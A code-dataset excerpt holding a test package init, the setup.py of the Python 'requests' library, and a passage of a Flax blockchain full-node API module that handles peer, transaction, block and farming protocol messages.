51b373b471e629e576daf90267c5bd4de8babe31
| 33
|
py
|
Python
|
test/__init__.py
|
ryanfeather/parsimony
|
0d3bbe247b47234a0c15962e538b2f04609c4a33
|
[
"MIT"
] | 1
|
2018-07-02T11:08:29.000Z
|
2018-07-02T11:08:29.000Z
|
test/__init__.py
|
ryanfeather/parsimony
|
0d3bbe247b47234a0c15962e538b2f04609c4a33
|
[
"MIT"
] | 5
|
2015-03-19T13:29:29.000Z
|
2015-04-04T19:47:01.000Z
|
test/__init__.py
|
ryanfeather/parsimony
|
0d3bbe247b47234a0c15962e538b2f04609c4a33
|
[
"MIT"
] | null | null | null |
from . import TestEvaluationUtils
| 33
| 33
| 0.878788
|
4e2ad936ebf4ab9adb537f3d0f7eccb6f7de5e58
| 3,334
|
py
|
Python
|
setup.py
|
spitGlued/requests
|
6cfbe1aedd56f8c2f9ff8b968efe65b22669795b
|
[
"Apache-2.0"
] | 14
|
2020-02-12T07:03:12.000Z
|
2022-01-08T22:15:59.000Z
|
setup.py
|
spitGlued/requests
|
6cfbe1aedd56f8c2f9ff8b968efe65b22669795b
|
[
"Apache-2.0"
] | 2
|
2020-02-24T17:01:20.000Z
|
2020-10-11T10:37:33.000Z
|
setup.py
|
spitGlued/requests
|
6cfbe1aedd56f8c2f9ff8b968efe65b22669795b
|
[
"Apache-2.0"
] | 1
|
2021-01-30T18:17:01.000Z
|
2021-01-30T18:17:01.000Z
|
#!/usr/bin/env python
# Learn more: https://github.com/kennethreitz/setup.py
import os
import re
import sys
from codecs import open
from setuptools import setup
from setuptools.command.test import test as TestCommand
here = os.path.abspath(os.path.dirname(__file__))
class PyTest(TestCommand):
user_options = [('pytest-args=', 'a', "Arguments to pass into py.test")]
def initialize_options(self):
TestCommand.initialize_options(self)
try:
from multiprocessing import cpu_count
self.pytest_args = ['-n', str(cpu_count()), '--boxed']
except (ImportError, NotImplementedError):
self.pytest_args = ['-n', '1', '--boxed']
def finalize_options(self):
TestCommand.finalize_options(self)
self.test_args = []
self.test_suite = True
def run_tests(self):
import pytest
errno = pytest.main(self.pytest_args)
sys.exit(errno)
# 'setup.py publish' shortcut.
if sys.argv[-1] == 'publish':
os.system('python setup.py sdist bdist_wheel')
os.system('twine upload dist/*')
sys.exit()
packages = ['requests']
requires = [
'chardet>=3.0.2,<3.1.0',
'idna>=2.5,<2.8',
'urllib3>=1.21.1,<1.25',
'certifi>=2017.4.17'
]
test_requirements = [
'pytest-httpbin==0.0.7',
'pytest-cov',
'pytest-mock',
'pytest-xdist',
'PySocks>=1.5.6, !=1.5.7',
'pytest>=2.8.0'
]
about = {}
with open(os.path.join(here, 'requests', '__version__.py'), 'r', 'utf-8') as f:
exec(f.read(), about)
with open('README.md', 'r', 'utf-8') as f:
readme = f.read()
with open('HISTORY.md', 'r', 'utf-8') as f:
history = f.read()
setup(
name=about['__title__'],
version=about['__version__'],
description=about['__description__'],
long_description=readme,
long_description_content_type='text/markdown',
author=about['__author__'],
author_email=about['__author_email__'],
url=about['__url__'],
packages=packages,
package_data={'': ['LICENSE', 'NOTICE'], 'requests': ['*.pem']},
package_dir={'requests': 'requests'},
include_package_data=True,
python_requires=">=2.7, !=3.0.*, !=3.1.*, !=3.2.*, !=3.3.*",
install_requires=requires,
license=about['__license__'],
zip_safe=False,
classifiers=[
'Development Status :: 5 - Production/Stable',
'Intended Audience :: Developers',
'Natural Language :: English',
'License :: OSI Approved :: Apache Software License',
'Programming Language :: Python',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: 3.7',
'Programming Language :: Python :: Implementation :: CPython',
'Programming Language :: Python :: Implementation :: PyPy'
],
cmdclass={'test': PyTest},
tests_require=test_requirements,
extras_require={
'security': ['pyOpenSSL >= 0.14', 'cryptography>=1.3.4', 'idna>=2.0.0'],
'socks': ['PySocks>=1.5.6, !=1.5.7'],
'socks:sys_platform == "win32" and python_version == "2.7"': ['win_inet_pton'],
},
)
| 30.309091
| 87
| 0.610678
|
99bcde443d48ada68a6f3fabc6903b8ddd61591b
| 61,632
|
py
|
Python
|
flax/full_node/full_node_api.py
|
amuDev/flax-blockchain
|
b19e99bf78b5d23e071c9a9c499f7698bc6ad7b8
|
[
"Apache-2.0"
] | 1
|
2021-06-24T07:24:21.000Z
|
2021-06-24T07:24:21.000Z
|
flax/full_node/full_node_api.py
|
wolfrage76/flax-blockchain
|
97d396ca35ce3ab585e357f8dd5e9a5a57c504fb
|
[
"Apache-2.0"
] | null | null | null |
flax/full_node/full_node_api.py
|
wolfrage76/flax-blockchain
|
97d396ca35ce3ab585e357f8dd5e9a5a57c504fb
|
[
"Apache-2.0"
] | 1
|
2021-06-21T00:20:33.000Z
|
2021-06-21T00:20:33.000Z
|
import asyncio
import dataclasses
import time
from secrets import token_bytes
from typing import Callable, Dict, List, Optional, Tuple, Set
from blspy import AugSchemeMPL, G2Element
from chiabip158 import PyBIP158
import flax.server.ws_connection as ws
from flax.consensus.block_creation import create_unfinished_block
from flax.consensus.block_record import BlockRecord
from flax.consensus.pot_iterations import calculate_ip_iters, calculate_iterations_quality, calculate_sp_iters
from flax.full_node.bundle_tools import best_solution_generator_from_template, simple_solution_generator
from flax.full_node.full_node import FullNode
from flax.full_node.mempool_check_conditions import get_puzzle_and_solution_for_coin
from flax.full_node.signage_point import SignagePoint
from flax.protocols import farmer_protocol, full_node_protocol, introducer_protocol, timelord_protocol, wallet_protocol
from flax.protocols.full_node_protocol import RejectBlock, RejectBlocks
from flax.protocols.protocol_message_types import ProtocolMessageTypes
from flax.protocols.wallet_protocol import PuzzleSolutionResponse, RejectHeaderBlocks, RejectHeaderRequest
from flax.server.outbound_message import Message, make_msg
from flax.types.blockchain_format.coin import Coin, hash_coin_list
from flax.types.blockchain_format.pool_target import PoolTarget
from flax.types.blockchain_format.program import Program
from flax.types.blockchain_format.sized_bytes import bytes32
from flax.types.coin_record import CoinRecord
from flax.types.end_of_slot_bundle import EndOfSubSlotBundle
from flax.types.full_block import FullBlock
from flax.types.generator_types import BlockGenerator
from flax.types.mempool_inclusion_status import MempoolInclusionStatus
from flax.types.mempool_item import MempoolItem
from flax.types.peer_info import PeerInfo
from flax.types.unfinished_block import UnfinishedBlock
from flax.util.api_decorators import api_request, peer_required, bytes_required, execute_task
from flax.util.generator_tools import get_block_header
from flax.util.hash import std_hash
from flax.util.ints import uint8, uint32, uint64, uint128
from flax.util.merkle_set import MerkleSet
class FullNodeAPI:
full_node: FullNode
def __init__(self, full_node) -> None:
self.full_node = full_node
def _set_state_changed_callback(self, callback: Callable):
self.full_node.state_changed_callback = callback
@property
def server(self):
return self.full_node.server
@property
def log(self):
return self.full_node.log
@property
def api_ready(self):
return self.full_node.initialized
@peer_required
@api_request
async def request_peers(self, _request: full_node_protocol.RequestPeers, peer: ws.WSFlaxConnection):
if peer.peer_server_port is None:
return None
peer_info = PeerInfo(peer.peer_host, peer.peer_server_port)
if self.full_node.full_node_peers is not None:
msg = await self.full_node.full_node_peers.request_peers(peer_info)
return msg
@peer_required
@api_request
async def respond_peers(
self, request: full_node_protocol.RespondPeers, peer: ws.WSFlaxConnection
) -> Optional[Message]:
self.log.debug(f"Received {len(request.peer_list)} peers")
if self.full_node.full_node_peers is not None:
await self.full_node.full_node_peers.respond_peers(request, peer.get_peer_info(), True)
return None
@peer_required
@api_request
async def respond_peers_introducer(
self, request: introducer_protocol.RespondPeersIntroducer, peer: ws.WSFlaxConnection
) -> Optional[Message]:
self.log.debug(f"Received {len(request.peer_list)} peers from introducer")
if self.full_node.full_node_peers is not None:
await self.full_node.full_node_peers.respond_peers(request, peer.get_peer_info(), False)
await peer.close()
return None
@execute_task
@peer_required
@api_request
async def new_peak(self, request: full_node_protocol.NewPeak, peer: ws.WSFlaxConnection) -> Optional[Message]:
"""
A peer notifies us that they have added a new peak to their blockchain. If we don't have it,
we can ask for it.
"""
async with self.full_node.new_peak_lock:
return await self.full_node.new_peak(request, peer)
@peer_required
@api_request
async def new_transaction(
self, transaction: full_node_protocol.NewTransaction, peer: ws.WSFlaxConnection
) -> Optional[Message]:
"""
A peer notifies us of a new transaction.
Requests a full transaction if we haven't seen it previously, and if the fees are enough.
"""
# Ignore if syncing
if self.full_node.sync_store.get_sync_mode():
return None
if not (await self.full_node.synced()):
return None
if int(time.time()) <= self.full_node.constants.INITIAL_FREEZE_END_TIMESTAMP:
return None
# Ignore if already seen
if self.full_node.mempool_manager.seen(transaction.transaction_id):
return None
if self.full_node.mempool_manager.is_fee_enough(transaction.fees, transaction.cost):
# If there's current pending request just add this peer to the set of peers that have this tx
if transaction.transaction_id in self.full_node.full_node_store.pending_tx_request:
if transaction.transaction_id in self.full_node.full_node_store.peers_with_tx:
current_set = self.full_node.full_node_store.peers_with_tx[transaction.transaction_id]
if peer.peer_node_id in current_set:
return None
current_set.add(peer.peer_node_id)
return None
else:
new_set = set()
new_set.add(peer.peer_node_id)
self.full_node.full_node_store.peers_with_tx[transaction.transaction_id] = new_set
return None
self.full_node.full_node_store.pending_tx_request[transaction.transaction_id] = peer.peer_node_id
new_set = set()
new_set.add(peer.peer_node_id)
self.full_node.full_node_store.peers_with_tx[transaction.transaction_id] = new_set
async def tx_request_and_timeout(full_node: FullNode, transaction_id, task_id):
counter = 0
try:
while True:
# Limit to asking 10 peers, it's possible that this tx got included on chain already
# Highly unlikely 10 peers that advertised a tx don't respond to a request
if counter == 10:
break
if transaction_id not in full_node.full_node_store.peers_with_tx:
break
peers_with_tx: Set = full_node.full_node_store.peers_with_tx[transaction_id]
if len(peers_with_tx) == 0:
break
peer_id = peers_with_tx.pop()
assert full_node.server is not None
if peer_id not in full_node.server.all_connections:
continue
peer = full_node.server.all_connections[peer_id]
request_tx = full_node_protocol.RequestTransaction(transaction.transaction_id)
msg = make_msg(ProtocolMessageTypes.request_transaction, request_tx)
await peer.send_message(msg)
await asyncio.sleep(5)
counter += 1
if full_node.mempool_manager.seen(transaction_id):
break
except asyncio.CancelledError:
pass
finally:
# Always Cleanup
if transaction_id in full_node.full_node_store.peers_with_tx:
full_node.full_node_store.peers_with_tx.pop(transaction_id)
if transaction_id in full_node.full_node_store.pending_tx_request:
full_node.full_node_store.pending_tx_request.pop(transaction_id)
if task_id in full_node.full_node_store.tx_fetch_tasks:
full_node.full_node_store.tx_fetch_tasks.pop(task_id)
task_id = token_bytes()
fetch_task = asyncio.create_task(
tx_request_and_timeout(self.full_node, transaction.transaction_id, task_id)
)
self.full_node.full_node_store.tx_fetch_tasks[task_id] = fetch_task
return None
return None
@api_request
async def request_transaction(self, request: full_node_protocol.RequestTransaction) -> Optional[Message]:
"""Peer has requested a full transaction from us."""
# Ignore if syncing
if self.full_node.sync_store.get_sync_mode():
return None
spend_bundle = self.full_node.mempool_manager.get_spendbundle(request.transaction_id)
if spend_bundle is None:
return None
transaction = full_node_protocol.RespondTransaction(spend_bundle)
msg = make_msg(ProtocolMessageTypes.respond_transaction, transaction)
return msg
@peer_required
@api_request
@bytes_required
async def respond_transaction(
self,
tx: full_node_protocol.RespondTransaction,
peer: ws.WSFlaxConnection,
tx_bytes: bytes = b"",
test: bool = False,
) -> Optional[Message]:
"""
Receives a full transaction from peer.
If tx is added to mempool, send tx_id to others. (new_transaction)
"""
assert tx_bytes != b""
spend_name = std_hash(tx_bytes)
if spend_name in self.full_node.full_node_store.pending_tx_request:
self.full_node.full_node_store.pending_tx_request.pop(spend_name)
if spend_name in self.full_node.full_node_store.peers_with_tx:
self.full_node.full_node_store.peers_with_tx.pop(spend_name)
await self.full_node.respond_transaction(tx.transaction, spend_name, peer, test)
return None
@api_request
async def request_proof_of_weight(self, request: full_node_protocol.RequestProofOfWeight) -> Optional[Message]:
if self.full_node.weight_proof_handler is None:
return None
if not self.full_node.blockchain.contains_block(request.tip):
self.log.error(f"got weight proof request for unknown peak {request.tip}")
return None
if request.tip in self.full_node.pow_creation:
event = self.full_node.pow_creation[request.tip]
await event.wait()
wp = await self.full_node.weight_proof_handler.get_proof_of_weight(request.tip)
else:
event = asyncio.Event()
self.full_node.pow_creation[request.tip] = event
wp = await self.full_node.weight_proof_handler.get_proof_of_weight(request.tip)
event.set()
tips = list(self.full_node.pow_creation.keys())
if len(tips) > 4:
# Remove old from cache
for i in range(0, 4):
self.full_node.pow_creation.pop(tips[i])
if wp is None:
self.log.error(f"failed creating weight proof for peak {request.tip}")
return None
# Serialization of wp is slow
if (
self.full_node.full_node_store.serialized_wp_message_tip is not None
and self.full_node.full_node_store.serialized_wp_message_tip == request.tip
):
return self.full_node.full_node_store.serialized_wp_message
message = make_msg(
ProtocolMessageTypes.respond_proof_of_weight, full_node_protocol.RespondProofOfWeight(wp, request.tip)
)
self.full_node.full_node_store.serialized_wp_message_tip = request.tip
self.full_node.full_node_store.serialized_wp_message = message
return message
@api_request
async def respond_proof_of_weight(self, request: full_node_protocol.RespondProofOfWeight) -> Optional[Message]:
self.log.warning("Received proof of weight too late.")
return None
@api_request
async def request_block(self, request: full_node_protocol.RequestBlock) -> Optional[Message]:
if not self.full_node.blockchain.contains_height(request.height):
reject = RejectBlock(request.height)
msg = make_msg(ProtocolMessageTypes.reject_block, reject)
return msg
header_hash = self.full_node.blockchain.height_to_hash(request.height)
block: Optional[FullBlock] = await self.full_node.block_store.get_full_block(header_hash)
if block is not None:
if not request.include_transaction_block and block.transactions_generator is not None:
block = dataclasses.replace(block, transactions_generator=None)
return make_msg(ProtocolMessageTypes.respond_block, full_node_protocol.RespondBlock(block))
reject = RejectBlock(request.height)
msg = make_msg(ProtocolMessageTypes.reject_block, reject)
return msg
@api_request
async def request_blocks(self, request: full_node_protocol.RequestBlocks) -> Optional[Message]:
if request.end_height < request.start_height or request.end_height - request.start_height > 32:
reject = RejectBlocks(request.start_height, request.end_height)
msg: Message = make_msg(ProtocolMessageTypes.reject_blocks, reject)
return msg
for i in range(request.start_height, request.end_height + 1):
if not self.full_node.blockchain.contains_height(uint32(i)):
reject = RejectBlocks(request.start_height, request.end_height)
msg = make_msg(ProtocolMessageTypes.reject_blocks, reject)
return msg
if not request.include_transaction_block:
blocks: List[FullBlock] = []
for i in range(request.start_height, request.end_height + 1):
block: Optional[FullBlock] = await self.full_node.block_store.get_full_block(
self.full_node.blockchain.height_to_hash(uint32(i))
)
if block is None:
reject = RejectBlocks(request.start_height, request.end_height)
msg = make_msg(ProtocolMessageTypes.reject_blocks, reject)
return msg
block = dataclasses.replace(block, transactions_generator=None)
blocks.append(block)
msg = make_msg(
ProtocolMessageTypes.respond_blocks,
full_node_protocol.RespondBlocks(request.start_height, request.end_height, blocks),
)
else:
blocks_bytes: List[bytes] = []
for i in range(request.start_height, request.end_height + 1):
block_bytes: Optional[bytes] = await self.full_node.block_store.get_full_block_bytes(
self.full_node.blockchain.height_to_hash(uint32(i))
)
if block_bytes is None:
reject = RejectBlocks(request.start_height, request.end_height)
msg = make_msg(ProtocolMessageTypes.reject_blocks, reject)
return msg
blocks_bytes.append(block_bytes)
respond_blocks_manually_streamed: bytes = (
bytes(uint32(request.start_height))
+ bytes(uint32(request.end_height))
+ len(blocks_bytes).to_bytes(4, "big", signed=False)
)
for block_bytes in blocks_bytes:
respond_blocks_manually_streamed += block_bytes
msg = make_msg(ProtocolMessageTypes.respond_blocks, respond_blocks_manually_streamed)
return msg
@api_request
async def reject_block(self, request: full_node_protocol.RejectBlock):
self.log.debug(f"reject_block {request.height}")
@api_request
async def reject_blocks(self, request: full_node_protocol.RejectBlocks):
self.log.debug(f"reject_blocks {request.start_height} {request.end_height}")
@api_request
async def respond_blocks(self, request: full_node_protocol.RespondBlocks) -> None:
self.log.warning("Received unsolicited/late blocks")
return None
@api_request
@peer_required
async def respond_block(
self,
respond_block: full_node_protocol.RespondBlock,
peer: ws.WSFlaxConnection,
) -> Optional[Message]:
"""
Receive a full block from a peer full node (or ourselves).
"""
self.log.warning(f"Received unsolicited/late block from peer {peer.get_peer_info()}")
return None
@api_request
async def new_unfinished_block(
self, new_unfinished_block: full_node_protocol.NewUnfinishedBlock
) -> Optional[Message]:
# Ignore if syncing
if self.full_node.sync_store.get_sync_mode():
return None
block_hash = new_unfinished_block.unfinished_reward_hash
if self.full_node.full_node_store.get_unfinished_block(block_hash) is not None:
return None
# This prevents us from downloading the same block from many peers
if block_hash in self.full_node.full_node_store.requesting_unfinished_blocks:
return None
msg = make_msg(
ProtocolMessageTypes.request_unfinished_block,
full_node_protocol.RequestUnfinishedBlock(block_hash),
)
self.full_node.full_node_store.requesting_unfinished_blocks.add(block_hash)
# However, we want to eventually download from other peers, if this peer does not respond
# Todo: keep track of who it was
async def eventually_clear():
await asyncio.sleep(5)
if block_hash in self.full_node.full_node_store.requesting_unfinished_blocks:
self.full_node.full_node_store.requesting_unfinished_blocks.remove(block_hash)
asyncio.create_task(eventually_clear())
return msg
@api_request
async def request_unfinished_block(
self, request_unfinished_block: full_node_protocol.RequestUnfinishedBlock
) -> Optional[Message]:
unfinished_block: Optional[UnfinishedBlock] = self.full_node.full_node_store.get_unfinished_block(
request_unfinished_block.unfinished_reward_hash
)
if unfinished_block is not None:
msg = make_msg(
ProtocolMessageTypes.respond_unfinished_block,
full_node_protocol.RespondUnfinishedBlock(unfinished_block),
)
return msg
return None
@peer_required
@api_request
async def respond_unfinished_block(
self,
respond_unfinished_block: full_node_protocol.RespondUnfinishedBlock,
peer: ws.WSFlaxConnection,
) -> Optional[Message]:
if self.full_node.sync_store.get_sync_mode():
return None
await self.full_node.respond_unfinished_block(respond_unfinished_block, peer)
return None
@api_request
@peer_required
async def new_signage_point_or_end_of_sub_slot(
self, new_sp: full_node_protocol.NewSignagePointOrEndOfSubSlot, peer: ws.WSFlaxConnection
) -> Optional[Message]:
# Ignore if syncing
if self.full_node.sync_store.get_sync_mode():
return None
if (
self.full_node.full_node_store.get_signage_point_by_index(
new_sp.challenge_hash,
new_sp.index_from_challenge,
new_sp.last_rc_infusion,
)
is not None
):
return None
if self.full_node.full_node_store.have_newer_signage_point(
new_sp.challenge_hash, new_sp.index_from_challenge, new_sp.last_rc_infusion
):
return None
if new_sp.index_from_challenge == 0 and new_sp.prev_challenge_hash is not None:
if self.full_node.full_node_store.get_sub_slot(new_sp.prev_challenge_hash) is None:
collected_eos = []
challenge_hash_to_request = new_sp.challenge_hash
last_rc = new_sp.last_rc_infusion
num_non_empty_sub_slots_seen = 0
for _ in range(30):
if num_non_empty_sub_slots_seen >= 3:
self.log.debug("Diverged from peer. Don't have the same blocks")
return None
# If this is an end of sub slot, and we don't have the prev, request the prev instead
# We want to catch up to the latest slot so we can receive signage points
full_node_request = full_node_protocol.RequestSignagePointOrEndOfSubSlot(
challenge_hash_to_request, uint8(0), last_rc
)
response = await peer.request_signage_point_or_end_of_sub_slot(full_node_request, timeout=10)
if not isinstance(response, full_node_protocol.RespondEndOfSubSlot):
self.full_node.log.debug(f"Invalid response for slot {response}")
return None
collected_eos.append(response)
if (
self.full_node.full_node_store.get_sub_slot(
response.end_of_slot_bundle.challenge_chain.challenge_chain_end_of_slot_vdf.challenge
)
is not None
or response.end_of_slot_bundle.challenge_chain.challenge_chain_end_of_slot_vdf.challenge
== self.full_node.constants.GENESIS_CHALLENGE
):
for eos in reversed(collected_eos):
await self.respond_end_of_sub_slot(eos, peer)
return None
if (
response.end_of_slot_bundle.challenge_chain.challenge_chain_end_of_slot_vdf.number_of_iterations
!= response.end_of_slot_bundle.reward_chain.end_of_slot_vdf.number_of_iterations
):
num_non_empty_sub_slots_seen += 1
challenge_hash_to_request = (
response.end_of_slot_bundle.challenge_chain.challenge_chain_end_of_slot_vdf.challenge
)
last_rc = response.end_of_slot_bundle.reward_chain.end_of_slot_vdf.challenge
self.full_node.log.warning("Failed to catch up in sub-slots")
return None
if new_sp.index_from_challenge > 0:
if (
new_sp.challenge_hash != self.full_node.constants.GENESIS_CHALLENGE
and self.full_node.full_node_store.get_sub_slot(new_sp.challenge_hash) is None
):
# If this is a normal signage point,, and we don't have the end of sub slot, request the end of sub slot
full_node_request = full_node_protocol.RequestSignagePointOrEndOfSubSlot(
new_sp.challenge_hash, uint8(0), new_sp.last_rc_infusion
)
return make_msg(ProtocolMessageTypes.request_signage_point_or_end_of_sub_slot, full_node_request)
# Otherwise (we have the prev or the end of sub slot), request it normally
full_node_request = full_node_protocol.RequestSignagePointOrEndOfSubSlot(
new_sp.challenge_hash, new_sp.index_from_challenge, new_sp.last_rc_infusion
)
return make_msg(ProtocolMessageTypes.request_signage_point_or_end_of_sub_slot, full_node_request)
@api_request
async def request_signage_point_or_end_of_sub_slot(
self, request: full_node_protocol.RequestSignagePointOrEndOfSubSlot
) -> Optional[Message]:
if request.index_from_challenge == 0:
sub_slot: Optional[Tuple[EndOfSubSlotBundle, int, uint128]] = self.full_node.full_node_store.get_sub_slot(
request.challenge_hash
)
if sub_slot is not None:
return make_msg(
ProtocolMessageTypes.respond_end_of_sub_slot,
full_node_protocol.RespondEndOfSubSlot(sub_slot[0]),
)
else:
if self.full_node.full_node_store.get_sub_slot(request.challenge_hash) is None:
if request.challenge_hash != self.full_node.constants.GENESIS_CHALLENGE:
self.log.info(f"Don't have challenge hash {request.challenge_hash}")
sp: Optional[SignagePoint] = self.full_node.full_node_store.get_signage_point_by_index(
request.challenge_hash,
request.index_from_challenge,
request.last_rc_infusion,
)
if sp is not None:
assert (
sp.cc_vdf is not None
and sp.cc_proof is not None
and sp.rc_vdf is not None
and sp.rc_proof is not None
)
full_node_response = full_node_protocol.RespondSignagePoint(
request.index_from_challenge,
sp.cc_vdf,
sp.cc_proof,
sp.rc_vdf,
sp.rc_proof,
)
return make_msg(ProtocolMessageTypes.respond_signage_point, full_node_response)
else:
self.log.info(f"Don't have signage point {request}")
return None
@peer_required
@api_request
async def respond_signage_point(
self, request: full_node_protocol.RespondSignagePoint, peer: ws.WSFlaxConnection
) -> Optional[Message]:
if self.full_node.sync_store.get_sync_mode():
return None
async with self.full_node.timelord_lock:
# Already have signage point
if self.full_node.full_node_store.have_newer_signage_point(
request.challenge_chain_vdf.challenge,
request.index_from_challenge,
request.reward_chain_vdf.challenge,
):
return None
existing_sp = self.full_node.full_node_store.get_signage_point(
request.challenge_chain_vdf.output.get_hash()
)
if existing_sp is not None and existing_sp.rc_vdf == request.reward_chain_vdf:
return None
peak = self.full_node.blockchain.get_peak()
if peak is not None and peak.height > self.full_node.constants.MAX_SUB_SLOT_BLOCKS:
next_sub_slot_iters = self.full_node.blockchain.get_next_slot_iters(peak.header_hash, True)
sub_slots_for_peak = await self.full_node.blockchain.get_sp_and_ip_sub_slots(peak.header_hash)
assert sub_slots_for_peak is not None
ip_sub_slot: Optional[EndOfSubSlotBundle] = sub_slots_for_peak[1]
else:
sub_slot_iters = self.full_node.constants.SUB_SLOT_ITERS_STARTING
next_sub_slot_iters = sub_slot_iters
ip_sub_slot = None
added = self.full_node.full_node_store.new_signage_point(
request.index_from_challenge,
self.full_node.blockchain,
self.full_node.blockchain.get_peak(),
next_sub_slot_iters,
SignagePoint(
request.challenge_chain_vdf,
request.challenge_chain_proof,
request.reward_chain_vdf,
request.reward_chain_proof,
),
)
if added:
await self.full_node.signage_point_post_processing(request, peer, ip_sub_slot)
else:
self.log.debug(
f"Signage point {request.index_from_challenge} not added, CC challenge: "
f"{request.challenge_chain_vdf.challenge}, RC challenge: {request.reward_chain_vdf.challenge}"
)
return None
@peer_required
@api_request
async def respond_end_of_sub_slot(
self, request: full_node_protocol.RespondEndOfSubSlot, peer: ws.WSFlaxConnection
) -> Optional[Message]:
if self.full_node.sync_store.get_sync_mode():
return None
msg, _ = await self.full_node.respond_end_of_sub_slot(request, peer)
return msg
@peer_required
@api_request
async def request_mempool_transactions(
self,
request: full_node_protocol.RequestMempoolTransactions,
peer: ws.WSFlaxConnection,
) -> Optional[Message]:
received_filter = PyBIP158(bytearray(request.filter))
items: List[MempoolItem] = await self.full_node.mempool_manager.get_items_not_in_filter(received_filter)
for item in items:
transaction = full_node_protocol.RespondTransaction(item.spend_bundle)
msg = make_msg(ProtocolMessageTypes.respond_transaction, transaction)
await peer.send_message(msg)
return None
# FARMER PROTOCOL
@api_request
@peer_required
async def declare_proof_of_space(
self, request: farmer_protocol.DeclareProofOfSpace, peer: ws.WSFlaxConnection
) -> Optional[Message]:
"""
Creates a block body and header, with the proof of space, coinbase, and fee targets provided
by the farmer, and sends the hash of the header data back to the farmer.
"""
if self.full_node.sync_store.get_sync_mode():
return None
async with self.full_node.timelord_lock:
sp_vdfs: Optional[SignagePoint] = self.full_node.full_node_store.get_signage_point(
request.challenge_chain_sp
)
if sp_vdfs is None:
self.log.warning(f"Received proof of space for an unknown signage point {request.challenge_chain_sp}")
return None
if request.signage_point_index > 0:
assert sp_vdfs.rc_vdf is not None
if sp_vdfs.rc_vdf.output.get_hash() != request.reward_chain_sp:
self.log.debug(
f"Received proof of space for a potentially old signage point {request.challenge_chain_sp}. "
f"Current sp: {sp_vdfs.rc_vdf.output.get_hash()}"
)
return None
if request.signage_point_index == 0:
cc_challenge_hash: bytes32 = request.challenge_chain_sp
else:
assert sp_vdfs.cc_vdf is not None
cc_challenge_hash = sp_vdfs.cc_vdf.challenge
pos_sub_slot: Optional[Tuple[EndOfSubSlotBundle, int, uint128]] = None
if request.challenge_hash != self.full_node.constants.GENESIS_CHALLENGE:
# Checks that the proof of space is a response to a recent challenge and valid SP
pos_sub_slot = self.full_node.full_node_store.get_sub_slot(cc_challenge_hash)
if pos_sub_slot is None:
self.log.warning(f"Received proof of space for an unknown sub slot: {request}")
return None
total_iters_pos_slot: uint128 = pos_sub_slot[2]
else:
total_iters_pos_slot = uint128(0)
assert cc_challenge_hash == request.challenge_hash
# Now we know that the proof of space has a signage point either:
# 1. In the previous sub-slot of the peak (overflow)
# 2. In the same sub-slot as the peak
# 3. In a future sub-slot that we already know of
# Checks that the proof of space is valid
quality_string: Optional[bytes32] = request.proof_of_space.verify_and_get_quality_string(
self.full_node.constants, cc_challenge_hash, request.challenge_chain_sp
)
assert quality_string is not None and len(quality_string) == 32
# Grab best transactions from Mempool for given tip target
aggregate_signature: G2Element = G2Element()
block_generator: Optional[BlockGenerator] = None
additions: Optional[List[Coin]] = []
removals: Optional[List[Coin]] = []
async with self.full_node.blockchain.lock:
peak: Optional[BlockRecord] = self.full_node.blockchain.get_peak()
if peak is not None:
# Finds the last transaction block before this one
curr_l_tb: BlockRecord = peak
while not curr_l_tb.is_transaction_block:
curr_l_tb = self.full_node.blockchain.block_record(curr_l_tb.prev_hash)
try:
mempool_bundle = await self.full_node.mempool_manager.create_bundle_from_mempool(
curr_l_tb.header_hash
)
except Exception as e:
self.full_node.log.error(f"Error making spend bundle {e} peak: {peak}")
mempool_bundle = None
if mempool_bundle is not None:
spend_bundle = mempool_bundle[0]
additions = mempool_bundle[1]
removals = mempool_bundle[2]
self.full_node.log.info(f"Add rem: {len(additions)} {len(removals)}")
aggregate_signature = spend_bundle.aggregated_signature
if self.full_node.full_node_store.previous_generator is not None:
self.log.info(
f"Using previous generator for height "
f"{self.full_node.full_node_store.previous_generator}"
)
block_generator = best_solution_generator_from_template(
self.full_node.full_node_store.previous_generator, spend_bundle
)
else:
block_generator = simple_solution_generator(spend_bundle)
def get_plot_sig(to_sign, _) -> G2Element:
if to_sign == request.challenge_chain_sp:
return request.challenge_chain_sp_signature
elif to_sign == request.reward_chain_sp:
return request.reward_chain_sp_signature
return G2Element()
def get_pool_sig(_1, _2) -> Optional[G2Element]:
return request.pool_signature
prev_b: Optional[BlockRecord] = self.full_node.blockchain.get_peak()
# Finds the previous block from the signage point, ensuring that the reward chain VDF is correct
if prev_b is not None:
if request.signage_point_index == 0:
if pos_sub_slot is None:
self.log.warning("Pos sub slot is None")
return None
rc_challenge = pos_sub_slot[0].reward_chain.end_of_slot_vdf.challenge
else:
assert sp_vdfs.rc_vdf is not None
rc_challenge = sp_vdfs.rc_vdf.challenge
# Backtrack through empty sub-slots
for eos, _, _ in reversed(self.full_node.full_node_store.finished_sub_slots):
if eos is not None and eos.reward_chain.get_hash() == rc_challenge:
rc_challenge = eos.reward_chain.end_of_slot_vdf.challenge
found = False
attempts = 0
while prev_b is not None and attempts < 10:
if prev_b.reward_infusion_new_challenge == rc_challenge:
found = True
break
if prev_b.finished_reward_slot_hashes is not None and len(prev_b.finished_reward_slot_hashes) > 0:
if prev_b.finished_reward_slot_hashes[-1] == rc_challenge:
# This block includes a sub-slot which is where our SP vdf starts. Go back one more
# to find the prev block
prev_b = self.full_node.blockchain.try_block_record(prev_b.prev_hash)
found = True
break
prev_b = self.full_node.blockchain.try_block_record(prev_b.prev_hash)
attempts += 1
if not found:
self.log.warning("Did not find a previous block with the correct reward chain hash")
return None
try:
finished_sub_slots: Optional[
List[EndOfSubSlotBundle]
] = self.full_node.full_node_store.get_finished_sub_slots(
self.full_node.blockchain, prev_b, cc_challenge_hash
)
if finished_sub_slots is None:
return None
if (
len(finished_sub_slots) > 0
and pos_sub_slot is not None
and finished_sub_slots[-1] != pos_sub_slot[0]
):
self.log.error("Have different sub-slots than is required to farm this block")
return None
except ValueError as e:
self.log.warning(f"Value Error: {e}")
return None
if prev_b is None:
pool_target = PoolTarget(
self.full_node.constants.GENESIS_PRE_FARM_POOL_PUZZLE_HASH,
uint32(0),
)
farmer_ph = self.full_node.constants.GENESIS_PRE_FARM_FARMER_PUZZLE_HASH
else:
farmer_ph = request.farmer_puzzle_hash
if request.proof_of_space.pool_contract_puzzle_hash is not None:
pool_target = PoolTarget(request.proof_of_space.pool_contract_puzzle_hash, uint32(0))
else:
assert request.pool_target is not None
pool_target = request.pool_target
